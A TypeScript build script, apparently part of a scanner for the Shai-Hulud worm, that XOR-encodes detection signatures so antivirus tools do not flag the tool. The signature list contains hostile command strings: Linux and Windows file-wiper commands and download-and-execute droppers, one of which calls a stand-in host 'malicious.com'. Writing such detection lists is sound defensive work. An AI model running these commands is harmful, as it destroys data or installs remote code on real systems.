import * as fs from 'fs';
import * as path from 'path';

/**
 * This script generates the encrypted signatures file.
 * It takes a list of known malicious strings and XOR encrypts them
 * so they don't trigger AV scanners when the tool is installed.
 */

const CIPHER_KEY = 0x5F;

// THE LIST OF MALICIOUS STRINGS TO HIDE
// These are the "signatures" of Shai-Hulud and other malware.
const SIGNATURES = {
    // Malicious filenames
    filenames: [
        'setup_bun.js',
        'bun_environment.js',
        'shai-hulud.js',
        'worm.js',
    ],
    // Malicious string patterns in scripts
    scriptPatterns: [
        'Shai-Hulud',
        'The Second Coming',
        'shred -uvz -n 1', // Linux wiper
        'del /F /Q /S "%USERPROFILE%*"', // Windows wiper
        'irm bun.sh/install.ps1|iex', // PowerShell dropper
        'curl -sL http://malicious.com | bash', // Generic dropper
    ],
    // EICAR Test String (for verifying the obfuscation works)
    eicar: [
        'X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*',
    ]
};

function encrypt(text: string): number[] {
    const bytes = [];
    for (let i = 0; i < text.length; i++) {
        bytes.push(text.charCodeAt(i) ^ CIPHER_KEY);
    }
    return bytes;
}

function generateFileContent() {
    const encryptedFilenames = SIGNATURES.filenames.map(encrypt);
    const encryptedPatterns = SIGNATURES.scriptPatterns.map(encrypt);
    const encryptedEicar = SIGNATURES.eicar.map(encrypt);

    return `/**
 * AUTO-GENERATED FILE - DO NOT EDIT
 * Generated by scripts/encrypt-signatures.ts
 *
 * This file contains XOR-encrypted signatures to avoid AV detection.
 */

export const ENCRYPTED_FILENAMES = ${JSON.stringify(encryptedFilenames)};
export const ENCRYPTED_PATTERNS = ${JSON.stringify(encryptedPatterns)};
export const ENCRYPTED_EICAR = ${JSON.stringify(encryptedEicar)};
`;
}

const outputPath = path.join(__dirname, '..', 'src', 'generated', 'signatures.ts');
const outputDir = path.dirname(outputPath);

if (!fs.existsSync(outputDir)) {
    fs.mkdirSync(outputDir, { recursive: true });
}

fs.writeFileSync(outputPath, generateFileContent());
console.log(`✅ Generated encrypted signatures at ${outputPath}`);
